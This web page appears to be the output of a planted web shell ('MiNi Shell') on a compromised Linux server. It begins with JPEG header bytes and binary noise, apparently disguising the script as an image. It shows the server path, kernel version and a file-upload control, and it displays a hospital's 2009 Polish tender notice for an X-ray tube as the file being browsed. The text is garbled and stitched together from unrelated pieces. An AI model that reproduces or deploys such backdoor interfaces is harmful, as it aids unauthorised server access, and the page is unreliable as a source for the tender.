JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090424/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090424/121078-N-2009.html

<p class="kh_header"><b>Poddębice: DOSTAWA LAMPY RENTGENOWSKIEJ</b><br>
<b>Numer ogłoszenia: 121078 - 2009; data zamieszczenia: 24.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej w Poddębicach , ul. Mickiewicza 16, 99-200 Poddębice, woj. łódzkie, tel. 043 678 36 22, faks 043 678 20 21.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital-poddebice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA LAMPY RENTGENOWSKIEJ.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.1 Przedmiotem zamówienia jest dostawa wraz z wymianą lampy rentgenowskiej w aparacie RTG SIRESKOP CX (Nr aparatu 1000414554, producent Siemens, rok produkcji 2000) dla Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Poddębicach. Kod CPV 33.11.10.00-1.
3.2 Wykonawca dostarczy oraz wymieni lampę rentgenowską w aparacie RTG SIRESKOP CX (Nr aparatu 1000414554, producent Siemens, rok produkcji 2000).
3.3 Szczegółowy opis przedmiotu zamówienia wraz z podaniem wymaganych przez zamawiającego parametrów technicznych określony został w Załączniku Nr 3 do SIWZ.
3.4 Wykonawca w Załączniku Nr 3 do SIWZ poda parametry techniczne oferowanego sprzętu oraz załączy oryginalne prospekty producenta, celem potwierdzenia, że sprzęt spełnia wymagania Zamawiającego.
3.5 Zamawiający wymaga, aby oferowana lampa była fabrycznie nowa, wyprodukowana w 2009 roku, nie używana, nie kondycjonowana, po zainstalowaniu gotowa do pracy, bez konieczności ponoszenia dodatkowych kosztów, nie wymagająca żadnych modyfikacji sprzętu RTG podczas jej instalacji.
3.6 Przedmiot dostawy musi odpowiadać wymaganiom polskich norm przenoszących  europejskie normy zharmonizowane lub też - w przypadku ich braku - europejskich aprobat technicznych, wspólnych specyfikacji technicznych, polskich norm przenoszących normy europejskie, polskich norm wprowadzających normy międzynarodowe, polskich norm, polskich aprobat technicznych (art. 30 ust. 1 i 2 ustawy Pzp).
3.7 Do składanej oferty Wykonawca jest zobowiązany załączyć dokumenty potwierdzające, że oferowany sprzęt medyczny posiada : 
 - deklarację zgodności zgodnie z Wytyczną nr 93/42/EEC dotyczącą urządzeń medycznych,
 - świadectwo wpisu do Rejestru Wyrobów Medycznych i podmiotów odpowiedzialnych za ich wprowadzenie do obrotu i używania, zgodnie z art. 54 ustawy z 20 kwietnia 2004 r. o wyrobach medycznych (Dz. U. Nr 93, poz. 896) lub oświadczenie że wyroby medyczne klasy I i IIa nie są objęte obowiązkiem zgłoszenia do Rejestru Wyrobów Medycznych.
 - zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzające, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym w formie certyfikat wyrobu medycznego CE lub deklaracji zgodności.
3.8 Dostarczona lampa musi posiadać dokumentację techniczną dostarczoną podczas instalacji, w języku polskim.
3.9 Dojazd serwisu w okresie gwarancji odbywa się na koszt i ryzyko Wykonawcy.
3.10 Dostawa przedmiotu zamówienia odbędzie się transportem Wykonawcy na jego koszt i ryzyko do siedziby zamawiającego.
3.11 Cena przedmiotu umowy zawiera wszystkie koszty związane z jego realizacją, w szczególności: cenę urządzenia, koszty i ryzyka związane z jego transportem, koszty montażu, koszty uzyskania wymaganych świadectw, atestów, zezwoleń oraz innych dokumentów niezbędnych przy realizacji przedmiotu zamówienia.
3.12 Należność za wykonaną usługę - cena brutto przedmiotu zamówienia, płatna będzie w 8 równych miesięcznych ratach, poczynając od miesiąca następującego po dokonaniu bezusterkowego odbioru końcowego dostawy, w terminie 30 dni od daty otrzymania prawidłowo wystawionej faktury.
3.13 Wykonawca na dostarczoną lampę udzieli minimum 12 miesięcy gwarancji licząc  od daty uruchomienia sprzętu oraz podpisania bezusterkowego protokołu odbioru.
3.14 Zamawiający wymaga, aby Wykonawca w okresie gwarancji:
 - usunął zgłoszone usterki i wykonał naprawy, w terminie maksymalnie do 14 dni kalendarzowych licząc od chwili przekazania zgłoszenia faxem,
3.15 Zamawiający wymaga, aby Wykonawca po dokonaniu wymiany:
3.15.1. wykonał kalibrację aparatu,
3.15.2. wykonał testy akceptacyjne aparatu,
3.15.3. dokonał utylizacji wymienionej/zdemontowanej lampy.
3.16 Jeżeli w czasie wykonywania dostawy Wykonawca będzie zlecał czynności związane z dostawą przedmiotu zamówienia innym podmiotom tj. podwykonawcom, zobowiązany jest wpisać zakres tych czynności w Załączniku nr 5 do SIWZ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.11.10.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 21.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają niżej określone warunki podmiotowe wynikające z art. 22 ust. 1 pkt. 1-4 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. z 2007 r., Nr 223, poz. 1655 z późn. zm.). 
a) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, 
Zamawiający uzna, że Wykonawca spełnia powyższy warunek, jeżeli Wykonawca złoży:
- Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności;
b) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym
Zamawiający uzna, że Wykonawca spełnia powyższy warunek, jeżeli Wykonawca w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, albo jeśli okres działalności jest krótszy - w tym okresie, wykonał 2 dostawy odpowiadające swoim rodzajem przedmiotowi zamówienia, o łącznej wartości nie mniejszej niż 60% wartości brutto składanej oferty wraz z podaniem wartości tych dostaw, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentów /referencje/ potwierdzających, że dostawy te zostały wykonane należycie. Ocena spełniania warunku nastąpi na podstawie wypełnionego Załącznika nr 6 do SIWZ.
lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia - dołączyć do oferty (jeśli dotyczy).                                 
c) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
d) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia w oparciu o art. 24 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych.
W zakresie spełnienia warunków pkt. c i pkt. d Zamawiający wymaga, aby Wykonawcy złożyli oświadczenie będące Załącznikiem Nr 4 do SIWZ.
Ocena spełniania ww. warunków dokonana zostanie na zasadzie spełnia/nie spełnia w oparciu o informacje zawarte w dokumentach wymienionych w pkt. 8 SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż ww. warunki Wykonawca spełnił. Nie spełnienie chociażby jednego z powyższych warunków skutkować będzie wykluczeniem Wykonawcy z udziału w przedmiotowym postępowaniu..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 8.1. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
8.2. Wykaz wykonanych 2 dostaw w ciągu ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem przedmiotowi zamówienia i o łącznej wartości stanowiącej 60% wartości brutto składanej oferty wraz z podaniem wartości tych dostaw, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentów (referencje) potwierdzających, że dostawy te zostały wykonane należycie - Załącznik Nr 6 do SIWZ.
8.3. Parafowany wzór umowy - Załącznik Nr 2.
8.4. Oświadczenie, że Wykonawca spełnia warunki o których mowa w art. 22 ust. 1 pkt. 1-4 i art. 24 ustawy Prawo zamówień publicznych (Dz. U. z 2007 r., Nr 223, poz. 1655 z późn. zm.) - Załącznik Nr 4 do SIWZ. 
8.5. Wykaz części zamówienia, które Wykonawca zamierza zlecić podwykonawcom - Załącznik Nr 5 do SIWZ.
8.6. Pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia (jeżeli dotyczy).
Inne dokumenty wymagane SIWZ:
8.7. Dokumenty potwierdzające, że oferowany sprzęt medyczny posiada : 
 - deklarację zgodności zgodnie z Wytyczną nr 93/42/EEC dotyczącą urządzeń medycznych,
- świadectwo wpisu do Rejestru Wyrobów Medycznych i podmiotów odpowiedzialnych za ich wprowadzenie do obrotu i używania, zgodnie z art. 54 ustawy z 20 kwietnia 2004 o wyrobach medycznych (Dz.U. nr 93 poz. 896) lub oświadczenie że wyroby medyczne klasy I i IIa nie są objęte obowiązkiem zgłoszenia do Rejestru Wyrobów Medycznych.,
- zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzające, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym w formie certyfikat wyrobu medycznego CE lub deklaracji zgodności.
8.8 Oryginalne prospekty producenta opisujące parametry techniczne oferowanego sprzętu medycznego.
8.9 Szczegółowy opis wymaganych parametrów technicznych Załącznik nr 3 do SIWZ.   


Informacja o zawartości oferty:
Ofertę stanowi: Formularz ofertowo - cenowy - Załącznik Nr 1 do SIWZ..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.szpital-poddebice.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej w Poddębicach
ul. Mickiewicza 16
99-200 Poddębice
Budynek Administracji, Sekretariat Dyrekcji I piętro.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.05.2009 godzina 10:00, miejsce: Samodzielny Publiczny Zakład Opieki Zdrowotnej w Poddębicach
ul. Mickiewicza 16
99-200 Poddębice
Budynek Administracji, Sekretariat Dyrekcji I piętro.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com